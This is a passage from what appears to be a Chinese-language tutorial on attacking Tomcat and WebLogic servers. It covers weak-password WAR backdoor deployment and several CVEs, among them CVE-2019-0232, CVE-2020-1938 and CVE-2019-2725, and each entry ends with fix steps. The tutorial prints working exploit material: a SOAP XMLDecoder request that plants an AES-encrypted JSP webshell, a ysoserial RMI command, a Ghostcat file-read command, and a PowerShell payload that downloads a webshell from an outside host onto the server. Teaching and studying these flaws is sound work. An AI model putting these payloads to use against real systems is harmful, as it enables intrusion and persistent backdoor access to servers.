PUT \/shell.jsp::$DATA<\/p>\n
PUT \/shell.jsp\/<\/p>\n
<\/p>\n
\u4fee\u590d<\/h3>\n
1.\u8bbe\u7f6e readonly\u4e3atrue<\/p>\n
2\u3001tomcat\u5f31\u53e3\u4ee4&war\u8fdc\u7a0b\u90e8\u7f72<\/h2>\n\u6f0f\u6d1e\u539f\u7406<\/h3>\n
\u5728tomcat8\u73af\u5883\u4e0b\u9ed8\u8ba4\u8fdb\u5165\u540e\u53f0\u7684\u5bc6\u7801\u4e3atomcat\/tomcat\uff0c\u672a\u4fee\u6539\u9020\u6210\u672a\u6388\u6743\u5373\u53ef\u8fdb\u5165\u540e\u53f0\uff0c\u6216\u8005\u7ba1\u7406\u5458\u628a\u5bc6\u7801\u8bbe\u7f6e\u6210\u5f31\u53e3\u4ee4\uff0c<\/p>\n
\u4f7f\u7528\u5de5\u5177\u5bf9\u5176\u8fdb\u884c\u7a77\u4e3e\u3002\u5f97\u5230\u5bc6\u7801\u540e\uff0c\u4e5f\u53ef\u4ee5\u8fdb\u884c\u540e\u53f0\u4e0a\u4f20\u6076\u610f\u4ee3\u7801\u63a7\u5236\u670d\u52a1\u5668<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
<\/p>\n
\u8f93\u5165\u8d26\u53f7\u548c\u5bc6\u7801 tomcat<\/p>\n
<\/p>\n
\u5236\u4f5c\u540e\u95e8 \u6253\u5305zip\u6539\u540d\u6210war\u5373\u53ef<\/p>\n
\u627e\u5230\u4e0a\u4f20\uff0c\u9009\u62e9waf\u4e0a\u4f20<\/p>\n
<\/p>\n
<\/p>\n
\u4e0a\u4f20\u4f1a\u81ea\u52a8\u89e3\u538b \u7528\u5ba2\u6237\u7aef\u8fdb\u884c\u8fde\u63a5\u5373\u53ef\u83b7\u53d6<\/p>\n
\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
1.\u8bbe\u7f6e\u5f3a\u53e3\u4ee4<\/p>\n
conf\/tomcat-users.xml<\/p>\n
<user username="tomcat" password="tomcat" roles="manager-gui,manager-<\/p>\n
script,manager-jmx,manager-status,admin-gui,admin-script" \/><\/p>\n
2.\u5220\u9664manger\u6587\u4ef6<\/p>\n
3\u3001tomcat \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c(CVE-2019-0232)<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
Apache Tomcat\u662f\u7f8e\u56fd\u963f\u5e15\u5947\uff08Apache\uff09\u8f6f\u4ef6\u57fa\u91d1\u4f1a\u7684\u4e00\u6b3e\u8f7b\u91cf\u7ea7Web\u5e94\u7528\u670d\u52a1\u5668\u3002\u8be5\u7a0b\u5e8f\u5b9e\u73b0\u4e86\u5bf9Servlet\u548cJavaServer Page\uff08JSP\uff09\u7684\u652f\u6301\u3002<\/p>\n
4\u670811\u65e5\uff0cApache\u5b98\u65b9\u53d1\u5e03\u901a\u544a\u79f0\u5c06\u5728\u6700\u65b0\u7248\u672c\u4e2d\u4fee\u590d\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2019-0232\uff09\uff0c\u7531\u4e8eJRE\u5c06\u547d\u4ee4\u884c\u53c2\u6570\u4f20\u9012\u7ed9Windows\u7684\u65b9\u5f0f\u5b58\u5728\u9519\u8bef\uff0c\u4f1a\u5bfc\u81f4CGI Servlet\u53d7\u5230\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u7684\u653b\u51fb\u3002<\/p>\n
\u89e6\u53d1\u8be5\u6f0f\u6d1e\u9700\u8981\u540c\u65f6\u6ee1\u8db3\u4ee5\u4e0b\u6761\u4ef6\uff1a<\/p>\n
\n- \n
\u7cfb\u7edf\u4e3aWindows<\/p>\n<\/li>\n
- \n
\u542f\u7528\u4e86CGI Servlet\uff08\u9ed8\u8ba4\u4e3a\u5173\u95ed\uff09<\/p>\n<\/li>\n
- \n
\u542f\u7528\u4e86enableCmdLineArguments\uff08Tomcat 9.0.*\u53ca\u5b98\u65b9\u672a\u6765\u53d1\u5e03\u7248\u672c\u9ed8\u8ba4\u4e3a\u5173\u95ed\uff09<\/p>\n<\/li>\n<\/ol>\n
\u5f71\u54cd\u8303\u56f4<\/h3>\n
Apache Tomcat 9.0.0.M1 to 9.0.17<\/p>\n
Apache Tomcat 8.5.0 to 8.5.39<\/p>\n
Apache Tomcat 7.0.0 to 7.0.93<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u642d\u5efatomcat\u540e\u4fee\u6539web.xml<\/p>\n
Tomcat\u7684CGI_Servlet\u7ec4\u4ef6\u9ed8\u8ba4\u662f\u5173\u95ed\u7684\uff0c\u5728 conf\/web.xml \u4e2d\u627e\u5230\u6ce8\u91ca\u7684CGIServlet\u90e8\u5206\uff0c\u53bb\u6389\u6ce8\u91ca\uff0c\u5e76\u914d\u7f6eenableCmdLineArguments\u548cexecutable\uff0c\u5982\u4e0b\uff1a<\/p>\n
<servlet>\n<servlet-name>cgi<\/servlet-name>\n<servlet-class>org.apache.catalina.servlets.CGIServlet<\/servlet-class>\n<init-param>\n<param-name>debug<\/param-name>\n<param-value>0<\/param-value>\n<\/init-param>\n<init-param>\n<param-name>cgiPathPrefix<\/param-name>\n<param-value>WEB-INF\/cgi-bin<\/param-value>\n<\/init-param>\n<init-param>\n<param-name>executable<\/param-name>\n<param-value><\/param-value>\n<\/init-param>\n<load-on-startup>5<\/load-on-startup>\n<\/servlet>\n<servlet-mapping>\n<servlet-name>cgi<\/servlet-name>\n<url-pattern>\/cgi-bin\/*<\/url-pattern>\n<\/servlet-mapping><\/code><\/pre>\n\u7136\u540e\u4fee\u6539\u5728conf\/context.xml\u4e2d\u7684\u6dfb\u52a0privileged="true"\u8bed\u53e5<\/p>\n
<Context privileged=\"true\">\n<!-- Default set of monitored resources. If one of these changes, the -->\n<!-- web application will be reloaded. -->\n<WatchedResource>WEB-INF\/web.xml<\/WatchedResource>\n<WatchedResource>${catalina.base}\/conf\/web.xml<\/WatchedResource>\n<!-- Uncomment this to disable session persistence across Tomcat restarts --\n>\n<!--\n<Manager pathname=\"\" \/>\n-->\n<\/Context><\/code><\/pre>\n\u5728webappsROOTWEB-INF\u4e0b\u521b\u5efa\u4e00\u4e2acgi-bin\u6587\u4ef6\u5939\uff0c\u5e76\u5728\u6587\u4ef6\u5939\u5185\u521b\u5efa\u4e00\u4e2abat\u6587\u4ef6\u5199\u5165<\/p>\n
@echo off<\/p>\n
echo Content-Type: text\/plain<\/p>\n
echo.<\/p>\n
set off=%~1<\/p>\n
%off%<\/p>\n
\u5b8c\u6210\u540e\u8bbf\u95eehttp:\/\/192.168.0.136:8080\/cgi-bin\/hello.bat?clienttype=8&version=7.55.1.101&from=win32_yunguanjia&C%3A%5CWindows%5CSystem32%5Cnet%20user<\/a><\/p>\n<\/p>\n
\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
\u53d7\u5f71\u54cd\u7248\u672c\u7684\u7528\u6237\u5e94\u8be5\u5e94\u7528\u4e0b\u5217\u5176\u4e2d\u4e00\u9879\u7f13\u89e3\u3002\u5347\u7ea7\u5230<\/p>\n
Apache Tomcat 9.0.18\u6216\u66f4\u9ad8\u7248\u672c<\/p>\n
Apache Tomcat 8.5.40\u6216\u66f4\u9ad8\u7248\u672c<\/p>\n
Apache Tomcat 7.0.93\u6216\u66f4\u9ad8\u7248\u672c<\/p>\n
4\u3001tomcat\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e(cve-2016-8735)<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
\u8be5\u6f0f\u6d1e\u4e0e\u4e4b\u524dOracle\u53d1\u5e03\u7684mxRemoteLifecycleListener\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff08CVE-2016-3427\uff09\u76f8\u5173\uff0c\u662f\u7531\u4e8e\u4f7f\u7528\u4e86JmxRemoteLifecycleListener\u7684\u76d1\u542c\u529f\u80fd\u6240\u5bfc\u81f4\u3002\u800c\u5728Oracle\u5b98\u65b9\u53d1\u5e03\u4fee\u590d\u540e\uff0cTomcat\u672a\u80fd\u53ca\u65f6\u4fee\u590d\u66f4\u65b0\u800c\u5bfc\u81f4 \u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002<\/p>\n
\u8be5\u6f0f\u6d1e\u6240\u9020\u6210\u7684\u6700\u6839\u672c\u539f\u56e0\u662fTomcat\u5728\u914d\u7f6eJMX\u505a\u76d1\u63a7\u65f6\u4f7f\u7528\u4e86JmxRemoteLifecycleListener\u7684\u65b9\u6cd5\u3002<\/p>\n
\u5f71\u54cd\u8303\u56f4<\/h3>\n
\u6f0f\u6d1e\u5f71\u54cd\u7248\u672c\uff1a<\/p>\n
ApacheTomcat 9.0.0.M1 \u52309.0.0.M11<\/p>\n
ApacheTomcat 8.5.0 \u52308.5.6<\/p>\n
ApacheTomcat 8.0.0.RC1 \u52308.0.38<\/p>\n
ApacheTomcat 7.0.0 \u52307.0.72<\/p>\n
ApacheTomcat 6.0.0 \u52306.0.47<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u5229\u7528\u6761\u4ef6\uff1a\u5916\u90e8\u9700\u8981\u5f00\u542fJmxRemoteLifecycleListener\u76d1\u542c\u768410001\u548c10002\u7aef\u53e3\uff0c\u6765\u5b9e\u73b0\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002<\/p>\n
conf\/server.xml\u4e2d\u7b2c30\u884c\u4e2d\u914d\u7f6e\u542f\u7528JmxRemoteLifecycleListener\u529f\u80fd\u76d1\u542c\u7684\u7aef\u53e3\uff1a<\/p>\n
<Listener className="org.apache.catalina.mbeans.JmxRemoteLifecycleListener"<\/p>\n
rmiRegistryPortPlatform="10001" rmiServerPortPlatform="10002" \/><\/p>\n
\u4fee\u6539bincatalina.bat<\/p>\n
\u5728Execute The Requested Comman\u4e0a\u9762\u6dfb\u52a0<\/p>\n
set CATALINA_OPTS=-Dcom.sun.management.jmxremote.ssl=false –<\/p>\n
Dcom.sun.management.jmxremote.authenticate=false<\/p>\n
<\/p>\n
-Dcom.sun.management.jmxremote.ssl=false \u6307\u5b9a\u662f\u5426\u4f7f\u7528SSL\u901a\u8baf<\/p>\n
-Dcom.sun.management.jmxremote.authenticate=false \u6307\u5b9a\u662f\u5426\u9700\u8981\u5bc6\u7801\u9a8c\u8bc1<\/p>\n
\u5141\u8bb8 startup.bat tomcat \u67e5\u770b\u7aef\u53e3<\/p>\n
<\/p>\n
\u6267\u884c\u547d\u4ee4<\/p>\n
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 192.168.0.167 10001<\/p>\n
Groovy1 "calc.exe"<\/p>\n
<\/p>\n
\u6267\u884c\u5f39\u7a97\u8ba1\u7b97\u5668<\/p>\n
\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
1\u3001\u5173\u95ed JmxRemoteLifecycleListener \u529f\u80fd\uff0c\u6216\u8005\u662f\u5bf9 jmx JmxRemoteLifecycleListener \u8fdc\u7a0b\u7aef\u53e3\u8fdb\u884c\u7f51\u7edc\u8bbf\u95ee\u63a7\u5236\u3002\u540c\u65f6\uff0c\u589e\u52a0\u4e25\u683c\u7684\u8ba4\u8bc1\u65b9\u5f0f\u3002<\/p>\n
2\u3001\u6839\u636e\u5b98\u65b9\u53bb\u5347\u7ea7\u66f4\u65b0\u76f8\u5bf9\u5e94\u7684\u7248\u672c<\/p>\n
5\u3001Apache Tomcat\u6587\u4ef6\u5305\u542b\u6f0f\u6d1eCVE-2020-1938\uff09<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
Tomcat\u662fApache\u5f00\u6e90\u7ec4\u7ec7\u5f00\u53d1\u7684\u7528\u4e8e\u5904\u7406HTTP\u670d\u52a1\u7684\u9879\u76ee\uff0c\u4e24\u8005\u90fd\u662f\u514d\u8d39\u7684\uff0c\u90fd\u53ef\u4ee5\u505a\u4e3a\u72ec\u7acb\u7684Web\u670d\u52a1\u5668\u8fd0\u884c\u3002Apache Tomcat\u670d\u52a1\u5668\u5b58\u5728\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u8bfb\u53d6\u6216\u5305\u542b Tomcat\u4e0a\u6240\u6709 webapp \u76ee\u5f55\u4e0b\u7684\u4efb\u610f\u6587\u4ef6\uff0c\u5982\uff1awebapp \u914d\u7f6e\u6587\u4ef6\u6216\u6e90\u4ee3\u7801\u7b49<\/p>\n
\u5f71\u54cd\u7248\u672c<\/h3>\n
Apache Tomcat 6<\/p>\n
Tomcat 7\u7cfb\u5217 <7.0.100<\/p>\n
Tomcat 8\u7cfb\u5217 < 8.5.51<\/p>\n
Tomcat 9 \u7cfb\u5217 <9.0.31<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
tomcat\u9ed8\u8ba4\u7684conf\/server.xml\u4e2d\u914d\u7f6e\u4e862\u4e2aConnector\uff0c\u4e00\u4e2a\u4e3a8080\u7684\u5bf9\u5916\u63d0\u4f9b\u7684HTTP\u534f\u8bae\u7aef\u53e3\uff0c\u53e6\u5916\u4e00\u4e2a\u5c31\u662f\u9ed8\u8ba4\u76848009 AJP\u534f\u8bae\u7aef\u53e3\uff0c\u4e24\u4e2a\u7aef\u53e3\u9ed8\u8ba4\u5747\u76d1\u542c\u5728\u5916\u7f51ip<\/p>\n
-->\n<Connector port=\"8080\" protocol=\"HTTP\/1.1\"\nconnectionTimeout=\"20000\"\nredirectPort=\"8443\" \/>\n<!-- A \"Connector\" using the shared thread pool-->\n<Connector executor=\"tomcatThreadPool\"\nport=\"8080\" protocol=\"HTTP\/1.1\"\nconnectionTimeout=\"20000\"\nredirectPort=\"8443\" \/>\n<!-- Define an AJP 1.3 Connector on port 8009 -->\n<Connector port=\"8009\" protocol=\"AJP\/1.3\" redirectPort=\"8443\" \/><\/code><\/pre>\ntomcat\u5728\u63a5\u6536ajp\u8bf7\u6c42\u7684\u65f6\u5019\u8c03\u7528org.apache.coyote.ajp.AjpProcessor\u6765\u5904\u7406ajp\u6d88\u606f\uff0cprepareRequest\u5c06ajp\u91cc\u9762\u7684\u5185\u5bb9\u53d6\u51fa\u6765\u8bbe\u7f6e\u6210request\u5bf9\u8c61\u7684Attribute\u5c5e\u6027\u3002\u53ef\u4ee5\u901a\u8fc7\u6b64\u79cd\u7279\u6027\u4ece\u800c\u53ef\u4ee5\u63a7\u5236request\u5bf9\u8c61\u7684\u4e0b\u9762\u4e09\u4e2aAttribute\u5c5e\u6027<\/p>\n
javax.servlet.include.request_uri<\/p>\n
javax.servlet.include.path_info<\/p>\n
javax.servlet.include.servlet_path<\/p>\n
\u518d\u901a\u8fc7\u63a7\u5236ajp\u63a7\u5236\u7684\u4e0a\u8ff0\u4e09\u4e2a\u5c5e\u6027\u6765\u8bfb\u53d6\u6587\u4ef6,\u901a\u8fc7\u64cd\u63a7\u4e0a\u8ff0\u4e09\u4e2a\u5c5e\u6027\u4ece\u800c\u53ef\u4ee5\u8bfb\u53d6\u5230\u5e94\u7528\u76ee\u5f55\u4e0b\u7684\u4efb\u4f55\u6587\u4ef6\u3002<\/p>\n
\u4f7f\u7528\u653b\u51fbpayload\u6267\u884c\u5373\u53ef<\/p>\n
https:\/\/github.com\/xindongzhuaizhuai\/CVE-2020-1938<\/a><\/p>\npython CVE-2020-1938.py -p 8009 -f \/WEB-INF\/web.xml 192.168.0.168<\/p>\n
<\/p>\n
\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
1.\u66f4\u65b0\u5230\u5b89\u5168\u7248\u672c<\/p>\n
Apache Tomcat 7.0.100<\/p>\n
Apache Tomcat 8.5.51<\/p>\n
Apache Tomcat 9.0.31<\/p>\n
https:\/\/tomcat.apache.org\/download-70.cgi<\/a><\/p>\nhttps:\/\/tomcat.apache.org\/download-80.cgi<\/a><\/p>\nhttps:\/\/tomcat.apache.org\/download-90.cgi<\/a><\/p>\n\u6216Github\u4e0b\u8f7d\uff1ahttps:\/\/github.com\/apache\/tomcat\/releases<\/a><\/p>\n2.\u5173\u95edAJP\u670d\u52a1\uff0c\u4fee\u6539Tomcat\u914d\u7f6e\u6587\u4ef6Service.xml,\u6ce8\u91ca\u6389<\/p>\n
3\u3001\u914d\u7f6eajp\u914d\u7f6e\u4e2d\u7684secretRequired\u8ddfsecret\u5c5e\u6027\u6765\u9650\u5236\u8ba4\u8bc1<\/p>\n
\u516d\u3001Weblogic<\/h1>\n
WebLogic\u662f\u7f8e\u56fdOracle\u516c\u53f8\u51fa\u54c1\u7684\u4e00\u4e2aapplication server\uff0c\u786e\u5207\u7684\u8bf4\u662f\u4e00\u4e2a\u57fa\u4e8eJAVAEE\u67b6\u6784\u7684\u4e2d\u95f4\u4ef6\uff0cWebLogic\u662f\u7528\u4e8e\u5f00\u53d1\u3001\u96c6\u6210\u3001\u90e8\u7f72\u548c\u7ba1\u7406\u5927\u578b\u5206\u5e03\u5f0fWeb\u5e94\u7528\u3001\u7f51\u7edc\u5e94\u7528\u548c\u6570\u636e\u5e93\u5e94\u7528\u7684Java\u5e94\u7528\u670d\u52a1\u5668\u3002\u5c06Java\u7684\u52a8\u6001\u529f\u80fd\u548cJava Enterprise\u6807\u51c6\u7684\u5b89\u5168\u6027\u5f15\u5165\u5927\u578b\u7f51\u7edc\u5e94\u7528\u7684\u5f00\u53d1\u3001\u96c6\u6210\u3001\u90e8\u7f72\u548c\u7ba1\u7406\u4e4b\u4e2d\u3002<\/p>\n
WebLogic\u662f\u7f8e\u5546Oracle\u7684\u4e3b\u8981\u4ea7\u54c1\u4e4b\u4e00\uff0c\u662f\u5e76\u8d2dBEA\u5f97\u6765\u3002\u662f\u5546\u4e1a\u5e02\u573a\u4e0a\u4e3b\u8981\u7684Java\uff08J2EE\uff09\u5e94\u7528\u670d\u52a1\u5668\u8f6f\u4ef6\uff08application server\uff09\u4e4b\u4e00\uff0c\u662f\u4e16\u754c\u4e0a\u7b2c\u4e00\u4e2a\u6210\u529f\u5546\u4e1a\u5316\u7684J2EE\u5e94\u7528\u670d\u52a1\u5668, \u5df2\u63a8\u51fa\u523012c(12.2.1.4) \u7248\u3002\u800c\u6b64\u4ea7\u54c1\u4e5f\u5ef6\u4f38\u51faWebLogic Portal\uff0cWebLogic Integration\u7b49\u4f01\u4e1a\u7528\u7684\u4e2d\u95f4\u4ef6\uff08\u4f46\u5f53\u4e0bOracle\u4e3b\u8981\u4ee5Fusion Middleware\u878d\u5408\u4e2d\u95f4\u4ef6\u6765\u53d6\u4ee3\u8fd9\u4e9bWebLogic Server\u4e4b\u5916\u7684\u4f01\u4e1a\u5305\uff09\uff0c\u4ee5\u53caOEPE(Oracle Enterprise Pack for Eclipse)\u5f00\u53d1\u5de5\u5177<\/p>\n
1\u3001weblogic \u5f31\u53e3\u4ee4getshell\u6f0f\u6d1e<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
\u5728weblogic\u642d\u5efa\u597d\u4e4b\u540e\u6ca1\u6709\u4fee\u6539\u8fdb\u5165\u540e\u53f0\u7684\u5bc6\u7801 \u5bfc\u81f4\u5f31\u53e3\u4ee4\u767b\u5f55\u83b7\u5f97webshell<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u8bbf\u95ee \u767b\u5f55\u9875\u9762<\/p>\n
\u4f7f\u7528\u9ed8\u8ba4\u5bc6\u7801\u8fdb\u884c\u767b\u5f55\uff0c\u5982\u679c\u767b\u5f55\u4e0d\u4e0a\u4f7f\u7528\u5b57\u6bb5\u8fdb\u884c\u7a77\u4e3e weblogic\u5e38\u7528\u5f31\u53e3\u4ee4\uff1a http:\/\/cirt.net\/passw<\/a>ords?criteria=weblogic<\/p>\n\u9519\u8bef\u5bc6\u78015\u6b21\u4e4b\u540e\u5c31\u4f1a\u81ea\u52a8\u9501\u5b9a\uff0c\u8fd9\u91cc\u4f7f\u7528weblogic\/Oracle@123\u767b\u9646\u540e\u53f0<\/p>\n
<\/p>\n
\u767b\u5f55\u540e\u53f0\u540e \u70b9\u51fb\u90e8\u7f72 \u70b9\u51fb\u5b89\u88c5 \u70b9\u51fb\u4e0a\u4f20\u6587\u4ef6<\/p>\n
<\/p>\n
<\/p>\n
jar -cvf aaa.war .<\/p>\n
\u6253\u5305\u540e\u95e8war\u6587\u4ef6 \u4e0a\u4f20\u5373\u53ef<\/p>\n
<\/p>\n
\u70b9\u51fb\u4e0b\u4e00\u6b65<\/p>\n
<\/p>\n
\u70b9\u51fb\u4e0b\u4e00\u6b65<\/p>\n
<\/p>\n
\u70b9\u51fb\u5b8c\u6210 \u6765\u5230\u8fd9\u4e2a\u9875\u9762<\/p>\n
<\/p>\n
\u8bbf\u95ee\u7f51\u7ad9\u7f51\u5740\u5373\u53ef\u83b7\u53d6webshell<\/p>\n
http:\/\/192.168.0.185:7001\/z\/shell.jsp<\/a><\/p>\n<\/p>\n
\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
1.\u8bbe\u7f6e\u5f3a\u53e3\u4ee4<\/p>\n
2\u3001XMLDecoder\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e(CVE-2017-3506)<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
WebLogic \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1eCVE-2017-3248\u548cWebLogic WLS LS\u7ec4\u4ef6\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1eCVE-2017-10271\uff0cOracle\u5b98\u65b9\u57282017\u5e7410\u6708\u4efd\u53d1\u5e03\u4e86\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01\uff0c\u4f46\u6ca1\u6709\u516c\u5f00\u6f0f\u6d1e\u7ec6\u8282\uff0c\u5982\u679c\u4f01\u4e1a\u672a\u53ca\u65f6\u5b89\u88c5\u8865\u4e01\uff0c\u5b58\u5728\u88ab\u653b\u51fb\u7684\u98ce\u9669\u3002\u5bf9\u4f01\u4e1a\u670d\u52a1\u5668\u53d1\u8d77\u4e86\u5927\u8303\u56f4\u8fdc\u7a0b\u653b\u51fb\uff0c\u5bf9\u5927\u91cf\u4f01\u4e1a\u7684\u670d\u52a1\u5668\u9020\u6210\u4e86\u4e25\u91cd\u5a01\u80c1\uff0c\u53d7\u5f71\u54cd\u7248\u672c\uff1a10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u73af\u5883weblogic\u7684\u7248\u672c\u4e3a10.3.6<\/p>\n
\u8bbf\u95ee\u4ee5\u4e0b\u76ee\u5f55\u4e2d\u7684\u4e00\u79cd\uff0c\u6709\u56de\u663e\u5982\u4e0b\u56fe\u53ef\u4ee5\u5224\u65adwls-wsat\u7ec4\u4ef6\u5b58\u5728<\/p>\n
\/wls-wsat\/CoordinatorPortType<\/p>\n
\/wls-wsat\/RegistrationPortTypeRPC<\/p>\n
\/wls-wsat\/ParticipantPortType<\/p>\n
\/wls-wsat\/RegistrationRequesterPortType<\/p>\n
\/wls-wsat\/CoordinatorPortType11<\/p>\n
\/wls-wsat\/RegistrationPortTypeRPC11<\/p>\n
\/wls-wsat\/ParticipantPortType11<\/p>\n
\/wls-wsat\/RegistrationRequesterPortType11<\/p>\n
<\/p>\n
\u53d1\u9001post\u5305<\/p>\n
POST \/wls-wsat\/CoordinatorPortType HTTP\/1.1<\/p>\n
Host: 192.168.0.185:7001<\/p>\n
User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0<\/p>\n
Accept: text\/hAccept-Encoding: gzip, deflate<\/p>\n
Accept: \/<\/em><\/p>\nAccept-Language: en<\/p>\n
User-Agent: Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;<\/p>\n
Trident\/5.0)<\/p>\n
Connection: close<\/p>\n
Content-Type: text\/xml<\/p>\n
Content-Length: 1228<\/p>\n
<soapenv:Envelope xmlns:soapenv=\"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\">\n<soapenv:Header>\n<work:WorkContext xmlns:work=\"http:\/\/bea.com\/2004\/06\/soap\/workarea\/\">\n<java><java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n<object class=\"java.io.PrintWriter\">\n<string>servers\/AdminServer\/tmp\/_WL_internal\/bea_wls_internal\/9j4dqk\/war\/test.js\np<\/string>\n<void method=\"println\"><string>\n<![CDATA[\n<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U\nextends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return\nsuper.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\"))\n{String k=\"e45e329feb5d925b\";session.putValue(\"u\",k);Cipher\nc=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new\nU(this.getClass().getClassLoader()).g(c.doFinal(new\nsun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta\nnce().equals(pageContext);}%>\n]]>\n<\/string>\n<\/void>\n<void method=\"close\"\/>\n<\/object><\/java><\/java>\n<\/work:WorkContext>\n<\/soapenv:Header>\n<soapenv:Body\/>\n<\/soapenv:Envelope>\n<\/code><\/pre>\n\u8bbf\u95ee\u7f51\u5740 \u5bc6\u7801 rebeyond<\/p>\n
<\/p>\n
\u4fee\u590d\u65b9\u6848<\/h3>\n
\u66f4\u65b0\u5230\u6700\u65b0\u7248\u672c,\u6253\u4e0a10271\u7684\u8865\u4e01,\u5bf9\u8bbf\u95eewls-wsat\u7684\u8d44\u6e90\u8fdb\u884c\u8bbf\u95ee\u63a7\u5236 ,\u6216\u8005\u6839\u636e\u4e1a\u52a1\u6240\u6709\u9700\u6c42\uff0c\u8003\u8651\u662f\u5426\u5220\u9664WLS-WebServices\u7ec4\u4ef6\u3002\u5305\u542b\u6b64\u7ec4\u4ef6\u8def\u5f84\u4e3a\uff1a<\/p>\n
Middleware\/user_projects\/domains\/base_domain\/servers\/AdminServer\/tmp\/_WL_internal\/wls-wsat<\/p>\n
Middleware\/user_projects\/domains\/base_domain\/servers\/AdminServer\/tmp\/.internal\/wls-<\/p>\n
wsat.war<\/p>\n
Middleware\/wlserver_10.3\/server\/lib\/wls-wsat.war<\/p>\n
\u4ee5\u4e0a\u8def\u5f84\u90fd\u5728WebLogic\u5b89\u88c5\u5904\u3002\u5220\u9664\u4ee5\u4e0a\u6587\u4ef6\u4e4b\u540e\uff0c\u9700\u91cd\u542fWebLogic\u3002\u786e\u8ba4http:\/\/weblogic_ip\/wls-w<\/a>sat\/ \u662f\u5426\u4e3a404\u9875\u9762<\/p>\n3\u3001wls-wsat\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e(CVE-2019-2725)<\/h2>\n\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n
CVE-2019-2725\u662f\u4e00\u4e2aOracle weblogic\u53cd\u5e8f\u5217\u5316\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u6f0f\u6d1e\u4f9d\u65e7\u662f\u6839\u636eweblogic\u7684xmldecoder\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff0c\u901a\u8fc7\u9488\u5bf9Oracle\u5b98\u7f51\u5386\u5e74\u6765\u7684\u8865\u4e01\u6784\u9020payload\u6765\u7ed5\u8fc7<\/p>\n
\u5f71\u54cd\u7248\u672c<\/h3>\n
weblogic 10.x<\/p>\n
weblogic 12.1.3<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h3>\n
\u6f0f\u6d1e\u5b58\u5728\u4e8e\uff1a_async\/AsyncResponseService\uff0c\u8bbf\u95ee\u5730\u5740\u53ef\u4ee5\u8bbf\u95ee\u5219\u5b58\u5728\u6f0f\u6d1e<\/p>\n
<\/p>\n
\u4f7f\u7528burpsuite\u63d0\u4ea4poc \u4e0b\u8f7d\u8fdc\u7a0b\u540e\u95e8\u5230\u6307\u5b9a\u76ee\u5f55<\/p>\n
POST \/_async\/AsyncResponseService HTTP\/1.1<\/p>\n
Host: 192.168.0.185:7001<\/p>\n
Content-Length: 910<\/p>\n
Accept-Encoding: gzip, deflate<\/p>\n
SOAPAction:<\/p>\n
Accept: \/<\/em><\/p>\nUser-Agent: Apache-HttpClient\/4.1.1 (java 1.5)<\/p>\n
Connection: keep-alive<\/p>\n
content-type: text\/xml<\/p>\n
<soapenv:Envelope xmlns:soapenv=\"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\"\nxmlns:wsa=\"http:\/\/www.w3.org\/2005\/08\/addressing\"\nxmlns:asy=\"http:\/\/www.bea.com\/async\/AsyncResponseService\">\n<soapenv:Header>\n<wsa:Action>xx<\/wsa:Action>\n<wsa:RelatesTo>xx<\/wsa:RelatesTo>\n<work:WorkContext xmlns:work=\"http:\/\/bea.com\/2004\/06\/soap\/workarea\/\">\n<void class=\"java.lang.ProcessBuilder\">\n<array class=\"java.lang.String\" length=\"3\">\n<void index=\"0\">\n<string>cmd<\/string>\n<\/void>\n<void index=\"1\">\n<string>\/c<\/string>\n<\/void>\n<void index=\"2\">\n<string>powershell(new-object\nSystem.Net.WebClient).DownloadFile('http:\/\/192.168.0.182:81\/shell.jsp.txt','serv\ners\/AdminServer\/tmp\/_WL_internal\/bea_wls9_async_response\/8tpkys\/war\/webshell.jsp\n')<\/string>\n<\/void>\n<\/array>\n<void 